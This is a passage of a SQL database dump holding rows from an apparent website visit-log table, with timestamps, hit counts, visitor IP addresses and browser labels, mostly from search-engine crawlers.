426595,1560086807,2,2,0,0,'66.249.69.62','chrome'),(426596,1560087096,1,1,0,0,'139.18.2.214','other'),(426597,1560087097,2,2,0,0,'66.249.69.60','chrome'),(426598,1560087287,1,1,0,0,'5.9.112.210','other'),(426599,1560087997,1,1,0,0,'139.18.2.214','other'),(426600,1560088122,1,1,0,0,'207.46.13.109','other'),(426601,1560088305,1,1,0,0,'5.45.207.76','other'),(426602,1560088735,86,86,0,0,'95.216.11.34','other'),(426603,1560088836,1,1,0,0,'40.77.167.105','other'),(426604,1560088903,1,1,0,0,'139.18.2.214','other'),(426605,1560088951,1,1,0,0,'178.154.244.49','other'),(426606,1560089359,1,1,0,0,'178.255.215.94','other'),(426607,1560089647,100,100,0,0,'95.216.11.34','other'),(426608,1560089811,1,1,0,0,'139.18.2.214','other'),(426609,1560089918,1,1,0,0,'207.46.13.109','other'),(426610,1560090235,1,1,0,0,'54.36.149.101','other'),(426611,1560090523,1,1,0,0,'180.76.15.151','other'),(426612,1560090554,92,92,0,0,'95.216.11.34','other'),(426613,1560090646,2,2,0,0,'66.249.69.60','chrome'),(426614,1560090681,1,1,0,0,'54.36.149.5','other'),(426615,1560090712,1,1,0,0,'139.18.2.214','other'),(426616,1560091455,22,22,0,0,'95.216.11.34','other'),(426617,1560091643,1,1,0,0,'139.18.2.214','other'),(426618,1560091698,1,1,0,0,'207.46.13.109','other'),(426619,1560091886,1,1,0,0,'54.36.149.86','other'),(426620,1560091998,1,1,0,0,'40.77.167.228','other'),(426621,1560092553,1,1,0,0,'139.18.2.214','other'),(426622,1560093080,1,1,0,0,'89.111.179.130','chrome'),(426623,1560093461,1,1,0,0,'139.18.2.214','other'),(426624,1560094026,1,1,0,0,'40.77.167.175','other'),(426625,1560094271,1,1,0,0,'8.29.198.25','other'),(426626,1560094380,1,1,0,0,'139.18.2.214','other'),(426627,1560094632,1,1,0,0,'54.36.149.5','other'),(426628,1560094940,1,1,0,0,'208.113.153.221','chrome'),(426629,1560094967,2,2,0,0,'109.234.160.21','chrome'),(426630,1560094988,3,3,0,0,'66.249.69.60','chrome'),(426631,1560095061,1,1,0,0,'54.36.149.3','other'),(426632,1560095119,1,1,0,0,'8.29.198.27','other'),(426633,1560095330,1,1,0,0,'139.18.2.214','other'),(426634,1560095430,1,1,0,0,'40.77.167.175','other'),(426635,1560096046,1,1,0,0,'207.46.13.109','other'),(426636,1560096256,1,1,0,0,'139.18.2.214','other'),(426637,1560096393,2,2,0,0,'123.206.225.17','chrome'),(426638,1560096684,1,1,0,0,'40.77.167.175','other'),(426639,1560096830,1,1,0,0,'180.235.129.104','chrome'),(426640,1560096903,1,1,0,0,'66.249.69.58','chrome'),(426641,1560097167,1,1,0,0,'66.249.69.62','chrome'),(426642,1560097198,1,1,0,0,'139.18.2.214','other'),(426643,1560097221,2,2,0,0,'207.46.13.109','other'),(426644,1560097807,2,2,0,0,'67.209.121.20','chrome'),(426645,1560098114,1,1,0,0,'139.18.2.214','other'),(426646,1560098478,2,2,0,0,'66.249.69.60','chrome'),(426647,1560098596,2,2,0,0,'207.46.13.109','other'),(426648,1560098655,1,1,0,0,'37.9.113.148','other'),(426649,1560098741,2,2,0,0,'5.45.207.79','other'),(426650,1560098858,2,2,0,0,'5.45.207.19','other'),(426651,1560099026,1,1,0,0,'139.18.2.214','other'),(426652,1560099517,2,2,0,0,'45.64.1.220','chrome'),(426653,1560100032,1,1,0,0,'139.18.2.214','other'),(426654,1560100130,1,1,0,0,'66.249.69.60','chrome'),(426655,1560100987,1,1,0,0,'139.18.2.214','other'),(426656,1560100990,2,2,0,0,'69.163.152.125','chrome'),(426657,1560101205,1,1,0,0,'157.55.39.216','other'),(426658,1560101516,2,2,0,0,'66.249.69.58','chrome'),(426659,1560101527,1,1,0,0,'66.249.69.60','chrome'),(426660,1560102081,1,1,0,0,'139.18.2.214','other'),(426661,1560102526,1,1,0,0,'157.55.39.216','other'),(426662,1560103155,1,1,0,0,'139.18.2.214','other'),(426663,1560103159,2,2,0,0,'5.45.207.79','other'),(426664,1560103545,1,1,0,0,'159.65.134.159','firefox'),(426665,1560103689,2,2,0,0,'178.154.244.11','other'),(426666,1560104022,1,1,0,0,'5.61.25.2','chrome'),(426667,1560104089,1,1,0,0,'139.18.2.214','other'),(426668,1560104450,1,1,0,0,'40.77.167.175','other'),(426669,1560104526,1,1,0,0,'66.249.69.60','chrome'),(426670,1560104976,2,2,0,0,'207.46.13.250','other'),(426671,1560105051,1,1,0,0,'139.18.2.214','other'),(426672,1560105119,1,1,0,0,'8.29.198.27','other'),(426673,1560105293,2,2,0,0,'108.167.136.36','chrome'),(426674,1560105525,2,2,0,0,'207.46.13.81','other'),(426675,1560105751,3,3,0,0,'94.247.27.80','chrome'),(426676,1560105765,1,1,0,0,'103.224.80.3','chrome'),(426677,1560105847,3,3,0,0,'66.249.69.58','chrome'),(426678,1560105857,1,1,0,0,'66.249.75.126','chrome'),(426679,1560105980,1,1,0,0,'8.29.198.25','other'),(426680,1560106013,1,1,0,0,'139.18.2.214','other'),(426681,1560106202,4,4,0,0,'66.249.69.60','chrome'),(426682,1560106242,1,1,0,0,'178.154.244.11','other'),(426683,1560106449,2,2,0,0,'66.249.69.62','chrome'),(426684,1560107048,1,1,0,0,'139.18.2.214','other'),(426685,1560107077,1,1,0,0,'193.202.110.23','chrome'),(426686,1560107270,1,1,0,0,'178.154.244.11','other'),(426687,1560107443,1,1,0,0,'13.66.139.0','other'),(426688,1560107649,2,2,0,0,'66.249.69.62','chrome'),(426689,1560107738,2,2,0,0,'66.249.69.60','chrome'),(426690,1560107905,1,1,0,0,'66.249.69.58','chrome'),(426691,1560108057,1,1,0,0,'139.18.2.214','other'),(426692,1560108342,1,1,0,0,'89.111.179.130','chrome'),(426693,1560108565,2,2,0,0,'193.202.110.22','chrome'),(426694,1560108744,1,1,0,0,'198.38.82.238','chrome'),(426695,1560108828,1,1,0,0,'72.52.226.70','chrome'),(426696,1560108905,1,1,0,0,'66.249.69.60','chrome'),(426697,1560109107,4,4,0,0,'66.249.69.58','chrome'),(426698,1560109157,1,1,0,0,'139.18.2.214','other'),(426699,1560109302,1,1,0,0,'66.249.69.62','chrome'),(426700,1560109500,1,1,0,0,'207.46.13.81','other'),(426701,1560109744,1,1,0,0,'66.102.9.28','chrome'),(426702,1560109807,1,1,0,0,'128.124.2.86','chrome'),(426703,1560110266,1,1,0,0,'139.18.2.214','other'),(426704,1560110312,2,2,0,0,'66.249.69.58','chrome'),(426705,1560110735,1,1,0,0,'193.106.30.98','chrome'),(426706,1560111008,1,1,0,0,'51.68.152.26','chrome'),(426707,1560111035,1,1,0,0,'87.250.224.65','other'),(426708,1560111228,1,1,0,0,'157.55.39.216','other'),(426709,1560111344,1,1,0,0,'139.18.2.214','other'),(426710,1560112018,1,1,0,0,'157.55.39.105','other'),(426711,1560112330,1,1,0,0,'139.18.2.214','other'),(426712,1560112572,1,1,0,0,'207.46.13.7','other'),(426713,1560112675,3,3,0,0,'207.46.13.81','other'),(426714,1560113269,1,1,0,0,'139.18.2.214','other'),(426715,1560113384,2,2,0,0,'157.55.39.105','other'),(426716,1560113393,2,2,0,0,'157.55.39.216','other'),(426717,1560113851,1,1,0,0,'66.249.69.60','chrome'),(426718,1560113862,1,1,0,0,'66.249.75.126','chrome'),(426719,1560114279,1,1,0,0,'139.18.2.214','other'),(426720,1560115302,1,1,0,0,'139.18.2.214','other'),(426721,1560115584,2,2,0,0,'207.46.13.7','other'),(426722,1560115907,1,1,0,0,'207.46.13.179','other'),(426723,1560115935,1,1,0,0,'5.45.207.19','other'),(426724,1560115976,2,2,0,0,'8.29.198.26','other'),(426725,1560116305,1,1,0,0,'139.18.2.214','other'),(426726,1560116356,2,2,0,0,'207.46.13.154','other'),(426727,1560116885,1,1,0,0,'207.46.13.179','other'),(426728,1560117275,1,1,0,0,'139.18.2.214','other'),(426729,1560117391,1,1,0,0,'107.173.204.16','other'),(426730,1560118034,1,1,0,0,'207.46.13.7','other'),(426731,1560118089,1,1,0,0,'66.249.69.60','chrome'),(426732,1560118101,1,1,0,0,'207.46.13.154','other'),(426733,1560118266,1,1,0,0,'139.18.2.214','other'),(426734,1560119278,1,1,0,0,'5.45.207.79','other'),(426735,1560119293,1,1,0,0,'141.8.142.103','other'),(426736,1560119683,1,1,0,0,'139.18.2.214','other'),(426737,1560120104,1,1,0,0,'207.46.13.154','other'),(426738,1560120257,1,1,0,0,'66.249.69.62','chrome'),(426739,1560120976,1,1,0,0,'139.18.2.214','other'),(426740,1560121722,1,1,0,0,'107.173.204.16','other'),(426741,1560122066,1,1,0,0,'207.46.13.7','other'),(426742,1560122092,1,1,0,0,'139.18.2.214','other'),(426743,1560122184,1,1,0,0,'66.249.69.62','chrome'),(426744,1560122311,2,2,0,0,'207.46.13.154','other'),(426745,1560123059,1,1,0,0,'139.18.2.214','other'),(426746,1560123142,1,1,0,0,'66.249.69.58','chrome'),(426747,1560123893,2,2,0,0,'178.92.31.4','chrome'),(426748,1560124161,1,1,0,0,'139.18.2.214','other'),(426749,1560124343,1,1,0,0,'207.46.13.179','other'),(426750,1560125195,1,1,0,0,'139.18.2.214','other'),(426751,1560125243,1,1,0,0,'157.55.39.216','other'),(426752,1560125337,1,1,0,0,'95.108.181.54','other'),(426753,1560125819,1,1,0,0,'207.46.13.179','other'),(426754,1560125865,1,1,0,0,'66.249.69.62','chrome'),(426755,1560126131,1,1,0,0,'178.92.31.4','chrome'),(426756,1560126157,1,1,0,0,'139.18.2.214','other'),(426757,1560126824,2,2,0,0,'8.29.198.26','other'),(426758,1560127035,1,1,0,0,'66.249.69.62','chrome'),(426759,1560127188,1,1,0,0,'139.18.2.214','other'),(426760,1560127213,1,1,0,0,'66.249.75.126','chrome'),(426761,1560127258,1,1,0,0,'207.46.13.196','other'),(426762,1560127879,1,1,0,0,'141.8.142.103','other'),(426763,1560128287,1,1,0,0,'66.249.69.62','chrome'),(426764,1560128303,1,1,0,0,'139.18.2.214','other'),(426765,1560128572,1,1,0,0,'66.249.75.124','chrome'),(426766,1560128935,2,2,0,0,'169.57.142.75','chrome'),(426767,1560129121,1,1,0,0,'207.46.13.200','other'),(426768,1560129248,1,1,0,0,'207.46.13.199','other'),(426769,1560129293,1,1,0,0,'139.18.2.214','other'),(426770,1560129356,4,4,0,0,'207.46.13.196','other'),(426771,1560129670,1,1,0,0,'176.8.91.216','chrome'),(426772,1560130221,1,1,0,0,'139.18.2.214','other'),(426773,1560130238,1,1,0,0,'66.249.75.126','chrome'),(426774,1560130732,1,1,0,0,'66.249.69.60','chrome'),(426775,1560130874,1,1,0,0,'180.76.15.143','other'),(426776,1560131403,1,1,0,0,'139.18.2.214','other'),(426777,1560131599,1,1,0,0,'188.68.208.102','other'),(426778,1560132450,1,1,0,0,'139.18.2.214','other'),(426779,1560132993,1,1,0,0,'157.55.39.208','other'),(426780,1560133530,1,1,0,0,'139.18.2.214','other'),(426781,1560133624,1,1,0,0,'193.106.30.98','chrome'),(426782,1560133950,1,1,0,0,'66.249.75.122','chrome'),(426783,1560133956,1,1,0,0,'66.249.75.124','chrome'),(426784,1560134343,1,1,0,0,'40.77.167.58','other'),(426785,1560134583,1,1,0,0,'139.18.2.214','other'),(426786,1560134594,1,1,0,0,'66.249.75.126','chrome'),(426787,1560134894,2,2,0,0,'139.59.19.175','chrome'),(426788,1560135353,2,2,0,0,'66.249.69.60','chrome'),(426789,1560135524,1,1,0,0,'139.18.2.214','other'),(426790,1560135790,2,2,0,0,'95.85.32.94','chrome'),(426791,1560136478,1,1,0,0,'40.77.167.162','other'),(426792,1560136514,1,1,0,0,'139.18.2.214','other'),(426793,1560136561,1,1,0,0,'64.90.48.102','chrome'),(426794,1560137621,1,1,0,0,'139.18.2.214','other'),(426795,1560137670,1,1,0,0,'8.29.198.26','other'),(426796,1560138225,1,1,0,0,'40.77.167.58','other'),(426797,1560138549,1,1,0,0,'8.29.198.27','other'),(426798,1560138706,1,1,0,0,'139.18.2.214','other'),(426799,1560139450,1,1,0,0,'67.209.121.20','chrome'),(426800,1560139713,1,1,0,0,'139.18.2.214','other'),(426801,1560139841,1,1,0,0,'178.154.244.11','other'),(426802,1560139856,1,1,0,0,'40.77.167.58','other'),(426803,1560139953,1,1,0,0,'178.154.244.21','other'),(426804,1560140200,1,1,0,0,'37.9.113.103','other'),(426805,1560140335,1,1,0,0,'144.76.96.236','other'),(426806,1560140499,1,1,0,0,'66.249.69.60','chrome'),(426807,1560140695,1,1,0,0,'139.18.2.214','other'),(426808,1560141655,1,1,0,0,'139.18.2.214','other'),(426809,1560142419,2,2,0,0,'146.255.98.107','chrome'),(426810,1560142584,1,1,0,0,'139.18.2.214','other'),(426811,1560143186,70,70,0,0,'173.208.206.50','other'),(426812,1560143500,1,1,0,0,'139.18.2.214','other'),(426813,1560143506,1,1,0,0,'66.249.69.62','chrome'),(426814,1560144001,2,2,0,0,'45.64.1.97','chrome'),(426815,1560144163,1,1,0,0,'139.162.60.18','chrome'),(426816,1560144164,1,1,0,0,'91.121.168.55','chrome'),(426817,1560144228,2,2,0,0,'77.104.138.238','chrome'),(426818,1560144509,1,1,0,0,'139.18.2.214','other'),(426819,1560144558,1,1,0,0,'95.84.186.86','msie'),(426820,1560144633,1,1,0,0,'178.154.244.11','other'),(426822,1560144742,1,1,0,0,'178.17.174.211','other'),(426823,1560144912,1,1,0,0,'157.55.39.72','other'),(426824,1560145514,1,1,0,0,'139.18.2.214','other'),(426825,1560145573,1,1,0,0,'5.61.27.125','chrome'),(426826,1560145880,1,1,0,0,'40.77.167.216','other'),(426827,1560145906,1,1,0,0,'37.9.113.103','other'),(426828,1560145933,1,1,0,0,'213.180.203.9','other'),(426829,1560145952,1,1,0,0,'66.249.69.60','chrome'),(426830,1560146429,1,1,0,0,'162.209.102.228','chrome'),(426831,1560146444,1,1,0,0,'139.18.2.214','other'),(426832,1560146760,1,1,0,0,'157.55.39.72','other'),(426833,1560147013,1,1,0,0,'93.75.80.203','msie'),(426834,1560147147,1,1,0,0,'207.46.13.151','other'),(426835,1560147378,1,1,0,0,'40.77.167.58','other'),(426836,1560147410,1,1,0,0,'139.18.2.214','other'),(426837,1560148055,2,2,0,0,'66.249.69.58','chrome'),(426838,1560148358,1,1,0,0,'139.18.2.214','other'),(426839,1560148522,1,1,0,0,'8.29.198.27','other'),(426840,1560148742,1,1,0,0,'81.95.119.189','chrome'),(426841,1560148861,1,1,0,0,'91.196.178.72','chrome'),(426842,1560149392,1,1,0,0,'139.18.2.214','other'),(426843,1560149396,1,1,0,0,'8.29.198.26','other'),(426844,1560149412,1,1,0,0,'157.55.39.72','other'),(426845,1560149539,1,1,0,0,'66.249.69.60','chrome'),(426846,1560149571,1,1,0,0,'178.154.244.11','other'),(426847,1560149826,1,1,0,0,'91.196.178.97','chrome'),(426848,1560150361,1,1,0,0,'40.77.167.221','other'),(426849,1560150412,1,1,0,0,'139.18.2.214','other'),(426850,1560150618,1,1,0,0,'64.71.32.71','chrome'),(426851,1560151461,1,1,0,0,'139.18.2.214','other'),(426852,1560152108,2,2,0,0,'66.249.69.58','chrome'),(426853,1560152425,1,1,0,0,'139.18.2.214','other'),(426854,1560152646,1,1,0,0,'66.249.69.62','chrome'),(426855,1560153321,2,2,0,0,'180.240.134.109','chrome'),(426856,1560153403,1,1,0,0,'139.18.2.214','other'),(426857,1560153654,1,1,0,0,'5.45.207.79','other'),(426858,1560153807,1,1,0,0,'213.108.45.138','chrome'),(426859,1560154252,1,1,0,0,'207.46.13.100','other'),(426860,1560154398,1,1,0,0,'139.18.2.214','other'),(426861,1560155231,1,1,0,0,'91.196.178.103','firefox'),(426862,1560155292,1,1,0,0,'91.196.178.72','chrome'),(426863,1560155323,1,1,0,0,'66.249.69.60','chrome'),(426864,1560155395,1,1,0,0,'139.18.2.214','other'),(426865,1560155620,1,1,0,0,'66.249.69.58','chrome'),(426866,1560155781,1,1,0,0,'207.46.13.151','other'),(426867,1560155851,1,1,0,0,'95.46.74.117','chrome'),(426868,1560155907,1,1,0,0,'193.106.30.98','chrome'),(426869,1560156011,1,1,0,0,'91.196.178.170','chrome'),(426870,1560156334,1,1,0,0,'89.31.140.40','chrome'),(426871,1560156335,1,1,0,0,'89.31.140.12','chrome'),(426872,1560156444,1,1,0,0,'139.18.2.214','other'),(426873,1560157147,1,1,0,0,'37.9.113.148','other'),(426874,1560157201,1,1,0,0,'141.8.142.108','other'),(426875,1560157280,1,1,0,0,'40.77.167.221','other'),(426876,1560157471,5,5,0,0,'66.249.69.60','chrome'),(426877,1560157558,1,1,0,0,'139.18.2.214','other'),(426878,1560157624,1,1,0,0,'37.9.113.103','other'),(426879,1560157975,1,1,0,0,'157.55.39.72','other'),(426880,1560158100,6,6,0,0,'66.249.69.58','chrome'),(426881,1560158197,2,2,0,0,'66.249.75.124','chrome'),(426882,1560158219,1,1,0,0,'66.249.75.122','chrome'),(426883,1560158327,1,1,0,0,'95.132.8.198','firefox'),(426884,1560158568,1,1,0,0,'139.18.2.214','other'),(426885,1560158651,1,1,0,0,'207.46.13.151','other'),(426886,1560158802,1,1,0,0,'207.46.13.100','other'),(426887,1560159337,2,2,0,0,'40.77.167.221','other'),(426888,1560159386,2,2,0,0,'8.29.198.26','other'),(426889,1560159422,2,2,0,0,'66.249.69.58','chrome'),(426890,1560159524,1,1,0,0,'139.18.2.214','other'),(426891,1560159545,2,2,0,0,'66.249.69.62','chrome'),(426892,1560159620,1,1,0,0,'66.249.75.122','chrome'),(426893,1560160115,1,1,0,0,'66.249.69.60','chrome'),(426894,1560160188,1,1,0,0,'149.210.196.54','chrome'),(426895,1560160231,1,1,0,0,'40.77.167.170','other'),(426896,1560160359,2,2,0,0,'40.77.167.221','other'),(426897,1560160518,1,1,0,0,'139.18.2.214','other'),(426898,1560160610,1,1,0,0,'193.106.30.98','chrome'),(426899,1560160872,2,2,0,0,'66.249.69.62','chrome'),(426900,1560161003,1,1,0,0,'207.46.13.100','other'),(426901,1560161457,1,1,0,0,'139.18.2.214','other'),(426902,1560161533,1,1,0,0,'91.196.178.99','chrome'),(426903,1560161556,1,1,0,0,'5.45.207.80','other'),(426904,1560161611,1,1,0,0,'40.77.167.170','other'),(426905,1560161687,1,1,0,0,'108.167.136.36','chrome'),(426906,1560161688,1,1,0,0,'109.74.154.72','chrome'),(426907,1560161832,1,1,0,0,'66.249.66.222','chrome'),(426908,1560161907,1,1,0,0,'37.55.226.19','chrome'),(426909,1560162118,1,1,0,0,'193.106.30.98','chrome'),(426910,1560162392,1,1,0,0,'139.18.2.214','other'),(426911,1560162739,1,1,0,0,'207.46.13.100','other'),(426912,1560163379,1,1,0,0,'139.18.2.214','other'),(426913,1560163559,1,1,0,0,'66.249.66.132','chrome'),(426914,1560163826,1,1,0,0,'66.249.66.222','chrome'),(426915,1560164190,2,2,0,0,'136.243.58.105','chrome'),(426916,1560164304,1,1,0,0,'139.18.2.214','other'),(426917,1560164767,2,2,0,0,'66.249.66.220','chrome'),(426918,1560164850,1,1,0,0,'66.249.66.222','chrome'),(426919,1560164974,2,2,0,0,'66.249.66.218','chrome'),(426920,1560165181,1,1,0,0,'37.55.145.118','firefox'),(426921,1560165237,1,1,0,0,'139.18.2.214','other'),(426922,1560165648,1,1,0,0,'80.78.45.211','chrome'),(426923,1560165935,1,1,0,0,'66.249.66.218','chrome'),(426924,1560166145,1,1,0,0,'139.18.2.214','other'),(426925,1560166278,1,1,0,0,'141.8.183.23','other'),(426926,1560166515,2,2,0,0,'40.77.167.221','other'),(426927,1560166616,1,1,0,0,'207.46.13.24','other'),(426928,1560166688,1,1,0,0,'80.78.45.211','chrome'),(426929,1560166950,1,1,0,0,'66.249.66.218','chrome'),(426930,1560167062,1,1,0,0,'139.18.2.214','other'),(426931,1560167323,1,1,0,0,'139.162.60.18','chrome'),(426932,1560167675,1,1,0,0,'207.46.13.24','other'),(426933,1560168103,1,1,0,0,'207.46.13.100','other'),(426934,1560168105,1,1,0,0,'178.154.244.11','other'),(426935,1560168186,1,1,0,0,'139.18.2.214','other'),(426936,1560168693,1,1,0,0,'91.196.178.74','chrome'),(426937,1560168974,1,1,0,0,'141.8.142.103','other'),(426938,1560169070,3,3,0,0,'207.46.13.100','other'),(426939,1560169145,1,1,0,0,'139.18.2.214','other'),(426940,1560169458,1,1,0,0,'40.77.167.40','other'),(426941,1560169481,2,2,0,0,'66.249.66.218','chrome'),(426942,1560169519,1,1,0,0,'66.249.66.222','chrome'),(426943,1560170112,1,1,0,0,'139.18.2.214','other'),(426944,1560170200,1,1,0,0,'46.211.101.137','chrome'),(426945,1560170249,1,1,0,0,'8.29.198.26','other'),(426946,1560170260,1,1,0,0,'66.249.66.220','chrome'),(426947,1560171118,1,1,0,0,'8.29.198.25','other'),(426948,1560171206,1,1,0,0,'139.18.2.214','other'),(426949,1560171672,2,2,0,0,'97.64.22.145','chrome'),(426950,1560171823,1,1,0,0,'66.249.66.218','chrome'),(426951,1560172091,1,1,0,0,'66.249.66.222','chrome'),(426952,1560172120,1,1,0,0,'66.249.66.220','chrome'),(426953,1560172181,1,1,0,0,'139.18.2.214','other'),(426954,1560172389,1,1,0,0,'40.77.167.125','other'),(426955,1560172457,1,1,0,0,'91.196.178.72','chrome'),(426956,1560172873,1,1,0,0,'62.210.83.78','firefox'),(426957,1560173131,1,1,0,0,'139.18.2.214','other'),(426958,1560173417,1,1,0,0,'178.154.244.65','other'),(426959,1560173470,1,1,0,0,'91.209.11.236','other'),(426960,1560174063,1,1,0,0,'139.18.2.214','other'),(426961,1560174254,3,3,0,0,'66.249.66.220','chrome'),(426962,1560174328,1,1,0,0,'95.132.8.198','firefox'),(426963,1560174971,1,1,0,0,'139.18.2.214','other'),(426964,1560175033,2,2,0,0,'40.77.167.125','other'),(426965,1560175893,1,1,0,0,'139.18.2.214','other'),(426966,1560176641,1,1,0,0,'5.45.207.76','other'),(426967,1560176836,1,1,0,0,'139.18.2.214','other'),(426968,1560176888,1,1,0,0,'91.196.178.129','chrome'),(426969,1560176949,1,1,0,0,'178.154.200.48','other'),(426970,1560177073,1,1,0,0,'46.211.39.144','chrome'),(426971,1560177100,1,1,0,0,'40.77.167.125','other'),(426972,1560177384,1,1,0,0,'5.45.207.19','other'),(426973,1560177518,1,1,0,0,'66.249.66.220','chrome'),(426974,1560177707,38,38,0,0,'173.208.130.202','other'),(426975,1560177850,1,1,0,0,'139.18.2.214','other'),(426976,1560177941,2,2,0,0,'198.46.83.219','chrome'),(426977,1560178161,1,1,0,0,'37.60.232.98','chrome'),(426978,1560178718,1,1,0,0,'144.76.186.38','other'),(426979,1560178801,1,1,0,0,'139.18.2.214','other'),(426980,1560179368,1,1,0,0,'40.77.167.2','other'),(426981,1560179510,1,1,0,0,'66.249.66.130','chrome'),(426982,1560179806,1,1,0,0,'139.18.2.214','other'),(426983,1560180491,2,2,0,0,'207.46.13.134','other'),(426984,1560180517,3,3,0,0,'207.46.13.174','other'),(426985,1560180522,4,4,0,0,'40.77.167.2','other'),(426986,1560180526,3,3,0,0,'40.77.167.125','other'),(426987,1560180734,1,1,0,0,'139.18.2.214','other'),(426988,1560180831,3,3,0,0,'176.9.9.94','other'),(426989,1560181080,1,1,0,0,'31.24.128.43','chrome'),(426990,1560181103,1,1,0,0,'207.46.13.2','other'),(426991,1560181133,1,1,0,0,'8.29.198.26','other'),(426992,1560181232,1,1,0,0,'213.180.203.61','other'),(426993,1560181698,1,1,0,0,'139.18.2.214','other'),(426994,1560181951,1,1,0,0,'40.77.167.125','other'),(426995,1560181998,1,1,0,0,'8.29.198.27','other'),(426996,1560182203,1,1,0,0,'207.46.13.134','other'),(426997,1560182703,1,1,0,0,'139.18.2.214','other'),(426998,1560182963,1,1,0,0,'66.249.66.220','chrome'),(426999,1560183604,1,1,0,0,'139.18.2.214','other'),(427000,1560183613,2,2,0,0,'144.76.6.230','other'),(427001,1560183724,1,1,0,0,'40.77.167.2','other'),(427002,1560184509,1,1,0,0,'139.18.2.214','other'),(427003,1560185374,1,1,0,0,'40.77.167.2','other'),(427004,1560185454,1,1,0,0,'139.18.2.214','other'),(427005,1560185524,1,1,0,0,'66.249.66.218','chrome'),(427006,1560185976,2,2,0,0,'66.249.66.220','chrome'),(427007,1560185985,1,1,0,0,'66.249.66.128','chrome'),(427008,1560186523,1,1,0,0,'139.18.2.214','other'),(427009,1560187506,1,1,0,0,'139.18.2.214','other'),(427010,1560188176,2,2,0,0,'40.77.167.26','other'),(427011,1560188416,1,1,0,0,'139.18.2.214','other'),(427012,1560188666,1,1,0,0,'40.77.167.2','other'),(427013,1560188827,1,1,0,0,'66.249.66.130','chrome'),(427014,1560189008,1,1,0,0,'207.46.13.2','other'),(427015,1560189332,2,2,0,0,'66.249.66.132','chrome'),(427016,1560189349,1,1,0,0,'139.18.2.214','other'),(427017,1560189638,1,1,0,0,'87.250.224.65','other'),(427018,1560189707,1,1,0,0,'77.104.154.196','chrome'),(427019,1560190105,1,1,0,0,'91.196.178.71','firefox'),(427020,1560190414,1,1,0,0,'139.18.2.214','other'),(427021,1560191009,1,1,0,0,'180.76.15.16','other'),(427022,1560191043,1,1,0,0,'87.250.224.47','other'),(427023,1560191118,1,1,0,0,'207.46.13.62','other'),(427024,1560191505,1,1,0,0,'139.18.2.214','other'),(427025,1560191676,1,1,0,0,'66.249.66.222','chrome'),(427026,1560191710,1,1,0,0,'40.77.167.26','other'),(427027,1560192017,1,1,0,0,'8.29.198.26','other'),(427028,1560192184,2,2,0,0,'207.46.13.62','other'),(427029,1560192412,1,1,0,0,'66.249.66.218','chrome'),(427030,1560192504,1,1,0,0,'139.18.2.214','other'),(427031,1560192875,1,1,0,0,'8.29.198.27','other'),(427032,1560193138,1,1,0,0,'50.62.56.237','chrome'),(427033,1560193279,2,2,0,0,'164.132.78.171','chrome'),(427034,1560193585,1,1,0,0,'139.18.2.214','other'),(427035,1560194255,1,1,0,0,'66.249.66.220','chrome'),(427036,1560194403,8,8,0,0,'176.9.9.94','other'),(427037,1560194508,1,1,0,0,'66.249.66.130','chrome'),(427038,1560194597,1,1,0,0,'139.18.2.214','other'),(427039,1560194794,2,2,0,0,'207.46.13.6','other'),(427040,1560195042,9,9,0,0,'144.76.186.38','other'),(427041,1560195306,1,1,0,0,'176.9.9.94','other'),(427042,1560195637,2,2,0,0,'95.213.141.126','opera'),(427043,1560195689,1,1,0,0,'139.18.2.214','other'),(427044,1560196083,1,1,0,0,'66.249.66.218','chrome'),(427045,1560196843,1,1,0,0,'157.55.39.67','other'),(427046,1560197287,2,2,0,0,'45.64.1.97','chrome'),(427047,1560198031,1,1,0,0,'40.77.167.90','other'),(427048,1560198308,1,1,0,0,'66.249.66.220','chrome'),(427049,1560198345,1,1,0,0,'66.33.196.105','chrome'),(427050,1560198905,1,1,0,0,'95.108.213.4','other'),(427051,1560198939,1,1,0,0,'5.45.207.79','other'),(427052,1560200197,2,2,0,0,'66.249.66.218','chrome'),(427053,1560201112,1,1,0,0,'37.9.113.103','other'),(427054,1560201140,1,1,0,0,'66.249.66.218','chrome'),(427055,1560201462,1,1,0,0,'46.243.220.21','chrome'),(427056,1560202888,1,1,0,0,'8.29.198.27','other'),(427057,1560203722,1,1,0,0,'8.29.198.26','other'),(427058,1560203874,4,4,0,0,'195.181.247.28','chrome'),(427059,1560204442,1,1,0,0,'91.196.178.69','chrome'),(427060,1560205427,1,1,0,0,'67.222.136.186','chrome'),(427061,1560205927,1,1,0,0,'178.20.225.137','chrome'),(427062,1560206057,1,1,0,0,'37.9.113.148','other'),(427063,1560206550,1,1,0,0,'207.46.13.120','other'),(427064,1560206621,1,1,0,0,'108.167.160.55','chrome'),(427065,1560206746,1,1,0,0,'66.249.66.220','chrome'),(427066,1560207187,2,2,0,0,'66.249.66.218','chrome'),(427067,1560207221,1,1,0,0,'207.46.13.124','other'),(427068,1560207224,2,2,0,0,'66.249.66.128','chrome'),(427069,1560207283,2,2,0,0,'151.80.199.93','chrome'),(427070,1560208081,1,1,0,0,'95.154.236.99','chrome'),(427071,1560208297,2,2,0,0,'207.46.13.115','other'),(427072,1560208560,1,1,0,0,'37.9.113.20','other'),(427073,1560209124,1,1,0,0,'207.46.13.52','other'),(427074,1560209969,2,2,0,0,'207.46.13.115','other'),(427075,1560209979,1,1,0,0,'40.77.167.160','other'),(427076,1560210039,1,1,0,0,'180.76.15.12','other'),(427077,1560210706,1,1,0,0,'178.154.244.11','other'),(427078,1560211130,1,1,0,0,'66.249.66.222','chrome'),(427079,1560211470,1,1,0,0,'66.249.66.220','chrome'),(427080,1560212039,1,1,0,0,'180.76.15.13','other'),(427081,1560212868,1,1,0,0,'66.249.66.218','chrome'),(427082,1560212935,4,4,0,0,'69.163.216.111','chrome'),(427083,1560213086,1,1,0,0,'66.249.66.130','chrome'),(427084,1560213319,1,1,0,0,'66.249.66.220','chrome'),(427085,1560213756,1,1,0,0,'8.29.198.26','other'),(427086,1560213913,1,1,0,0,'66.249.66.218','chrome'),(427087,1560214571,1,1,0,0,'8.29.198.27','other'),(427088,1560214693,1,1,0,0,'209.17.96.10','other'),(427089,1560214808,9,9,0,0,'176.9.9.94','other'),(427090,1560215716,5,5,0,0,'176.9.9.94','other'),(427091,1560215812,2,2,0,0,'51.15.72.153','chrome'),(427092,1560216136,1,1,0,0,'66.249.66.220','chrome'),(427093,1560216161,2,2,0,0,'141.8.142.103','other'),(427094,1560216165,1,1,0,0,'5.45.207.19','other'),(427095,1560217105,1,1,0,0,'37.60.250.193','chrome'),(427096,1560217307,2,2,0,0,'40.77.167.103','other'),(427097,1560217365,2,2,0,0,'97.64.22.145','chrome'),(427098,1560217681,1,1,0,0,'66.249.66.128','chrome'),(427099,1560218751,1,1,0,0,'40.77.167.103','o